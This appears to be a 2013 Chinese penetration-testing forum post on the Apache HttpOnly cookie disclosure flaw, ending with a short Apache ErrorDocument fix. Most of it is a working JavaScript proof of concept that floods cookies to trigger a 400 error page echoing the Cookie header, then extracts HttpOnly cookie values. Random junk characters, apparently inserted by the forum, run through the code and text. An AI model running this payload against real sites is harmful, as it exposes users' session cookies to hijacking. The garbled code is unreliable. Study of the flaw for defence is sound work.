中国网络渗透测试联盟

标题: Apache HttpOnly Cookie XSS跨站漏洞 [打印本页]

作者: admin    时间: 2013-4-19 19:15
标题: Apache HttpOnly Cookie XSS跨站漏洞
很多程序以及一些商业或者成熟开源的cms文章系统为了防止xss盗取用户cookie的问题,一般都采用给cookie加上httponly的属性,来禁止直接使用js得到用户的cookie,从而降低xss的危害,而这个问题刚好可以用来绕过cookie的这个httponly的属性。
- w& o- f' I8 w0 P4 W
9 ]0 ?$ q# p& X, l  |用chrome打开一个站点,F12打开开发者工具,找到console输入如下代码并回车:
3 d  c2 k9 t6 @# v# l9 i, d$ N
, k  p9 X, r0 ^2 m: D7 ]
0 [/ q: h3 R' n- t9 r$ E// http://www.exploit-db.com/exploits/18442/7 Y+ |6 d" @* B2 L9 V( L, S
function setCookies (good) {. w1 q/ r- U; C% w
// Construct string for cookie value
: F2 F) c8 w: m7 t2 u! m& Jvar str = "";
" Z$ a, A) o/ n" R+ Cfor (var i=0; i< 819; i++) {2 t3 `& \% Y- W5 z
str += "x";
; @* d0 i2 O# r+ ^" B8 q}
/ M$ P- ~+ s) S3 b! E1 }// Set cookies! U: g  X. r( N. g* u! Y; I+ V  J, o
for (i = 0; i < 10; i++) {
1 J  ~4 F( c: H: T; Z  p- h// Expire evil cookie& j, ~5 y: F1 B5 d: |
if (good) {
  _. G( B$ B9 Yvar cookie = "xss"+i+"=;expires="+new Date(+new Date()-1).toUTCString()+"; path=/;";3 x$ P4 b' |/ Z6 G* n3 [% \
}
$ g6 x3 ~* ]! \, N' H$ W// Set evil cookie
+ l* T- M) O+ O3 n' Belse {2 T: Q! A8 D3 x4 \+ A# w" w
var cookie = "xss"+i+"="+str+";path=/";
3 V3 }: L( {5 O8 Z; W}
0 t; u! c5 m% x* _6 ^document.cookie = cookie;
2 ]7 j& a9 I/ h3 \  Q! P}4 f% s7 g* j; |: {4 i$ b
}5 J6 S) T, c* i7 I" F6 _
function makeRequest() {, X7 ?$ w9 y. n$ u, W7 ?! C
setCookies();4 X9 I5 ~5 n) Z- K% P5 y' v# c
function parseCookies () {2 `$ Z- Y7 |! Q
var cookie_dict = {};
, F, Z2 F; A' Z8 k7 q// Only react on 400 status5 t1 u4 _6 l5 @, B$ y2 x8 m
if (xhr.readyState === 4 && xhr.status === 400) {5 C1 w" k6 u. `
// Replace newlines and match <pre> content
4 Y# z$ s" C. z6 @& rvar content = xhr.responseText.replace(/\r|\n/g,'').match(/<pre>(.+)<\/pre>/);
3 U* K. V' x# Z$ C/ b+ fif (content.length) {
& D: j3 u! m& W" @$ E6 o$ Q: ~// Remove Cookie: prefix5 I+ d& E5 n$ |( P/ G
content = content[1].replace("Cookie: ", "");" @' [! p$ h; K4 n/ X/ z1 I0 x+ E
var cookies = content.replace(/xss\d=x+;?/g, '').split(/;/g);
" b4 i' ?3 u$ f* M// Add cookies to object
  ^3 N8 l" p* R) ?2 h' ~. Xfor (var i=0; i<cookies.length; i++) {
, ^  T% F4 R' c# R. evar s_c = cookies.split('=',2);/ \9 n3 B, O2 ?' @* l/ U/ X
cookie_dict[s_c[0]] = s_c[1];( h" S1 ?  k3 k
}
1 r2 D/ K1 h0 J9 |) c' n0 C( q}
5 g; {/ M5 C- U2 H) F( r% ]// Unset malicious cookies+ f7 L7 ~3 H0 Z5 p) @! W3 |
setCookies(true);
# |, E1 B# L  v3 \: U5 Balert(JSON.stringify(cookie_dict));
6 n( _5 L* }% E( d}
- ^% T7 P" ~, S( @0 G}6 X; M5 d) d# ~. c- g+ s
// Make XHR request" m, B: O; L- s& h  w: _
var xhr = new XMLHttpRequest();
5 Q0 X4 ~/ p$ n( \8 T/ t3 |  axhr.onreadystatechange = parseCookies;2 u0 Q4 U2 l1 H
xhr.open("GET", "/", true);2 h4 W+ H+ X* w& r* @$ X
xhr.send(null);
# T1 L- x' V  ~# l& e! x! k! Q, v, Q}2 w9 _* h4 L! \1 B( Z8 @
makeRequest();
' [0 m1 ~. K' F  z, T- K" v; N
& R+ [0 ]* a' n. |  `* Z0 }你就能看见华丽丽的400错误包含着cookie信息。
+ i8 S" b1 ?) Q7 K* _3 ?- m4 E4 p" N. @* _5 T
下载地址:https://gist.github.com/pilate/1955a1c28324d4724b7b/download#7 F) D: Z% f% O4 @( u

5 q* B2 {2 T/ V4 r; s修复方案:$ a- h% B, _' U
, V0 ]6 X$ N/ q( O1 y! o" m" ~
Apache官方提供4种错误处理方式(http://httpd.apache.org/docs/2.0/mod/core.html#errordocument),如下; t9 f7 g( {6 T* K+ ]& q- w

# H# @: F( o& ]* s& P  FIn the event of a problem or error, Apachecan be configured to do one of four things,2 E  y! t4 N: b% d1 E

/ E  U' V: q/ Y* f+ o( l1. output asimple hardcoded error message输出一个简单生硬的错误代码信息' v0 x) \7 Y9 J8 R. k5 N
2. output acustomized message输出一段信息
! a% s: f' l1 E0 @0 E3. redirect to alocal URL-path to handle the problem/error转向一个本地的自定义页面
5 E3 q# H1 O% V. t4. redirect to an external URL to handle theproblem/error转向一个外部URL
+ S/ ^& X9 \5 d, k7 ?
3 k: T+ c3 g0 ]# ?# v9 q) ~. C经测试,对于400错误只有方法2有效,返回包不会再包含cookie内容; R8 q$ L0 v: g. U, W# [

/ ]& I! @3 b/ O: DApache配置:% N) P4 w  ~  a! Y' f

+ H4 [' J* }5 J7 dErrorDocument400 " security test"- h8 v) }# H. R, Z' N- N! J

! r! n; j0 A; |( m' \' J" D当然,升级apache到最新也可:)。; `' w0 V5 P) n! m' p

( R; k) ]* ~- X( [1 L) F! N参考:http://httpd.apache.org/security/vulnerabilities_22.html; N2 |8 s( b. d! W, {
- ]: l9 D) b0 ]* H5 q/ T' R! G





欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2